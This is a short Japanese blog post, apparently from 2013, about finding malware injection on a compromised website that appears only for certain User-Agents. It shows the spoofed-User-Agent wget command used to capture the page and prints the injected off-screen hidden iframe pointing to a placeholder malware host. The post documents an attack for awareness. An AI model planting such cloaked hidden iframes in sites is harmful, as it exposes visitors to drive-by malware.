UserAgentを見て出力するマルウェアによる改竄、やっと発見+追記
http://d.hatena.ne.jp/ohesotori/20130820/1377011031
この時みたのとはまた違う改竄内容を見た。
前は数字の羅列だったけど今回はiframe。なんだかな。
今回は、wgetで捕捉。
wget http://<cracked site name>/ --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
そしたら下記コード出現。妙なところに出力・表示されるみたい
<li><a href="http://<cracked site name> <iframe src=" http://<malware site?>:7761/ServerAdministrator/system-administration/ money/itunes.php?desktop=1" width="100" height="100" style="width:100px; height:100px;position:absolute;left:-10000px;top:0;"></iframe>/closed /index.html">営業時間・休館日</a></li>
UserAgent 見てるから、単純に wget しただけじゃ出てきてくれない。
なんだろね。その先もちょっと調べたけど、面倒くさくなったので放置。
- 9/13 追記
今日取得してみたらやはりコードは現れなかった。9/10 に取得したコードだけ。やなかんじ。Google は危険認定だしてたはずなんだけどなー。
- 10/7 追記
なんとリニューアルオープンしやがった。